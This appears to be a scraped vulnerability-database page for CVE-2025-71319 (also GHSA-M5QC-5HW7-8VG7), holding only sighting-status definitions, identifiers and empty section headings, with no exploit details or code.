Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-71319 (GCVE-0-2025-71319)

FKIE_CVE-2025-71319

GHSA-M5QC-5HW7-8VG7

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature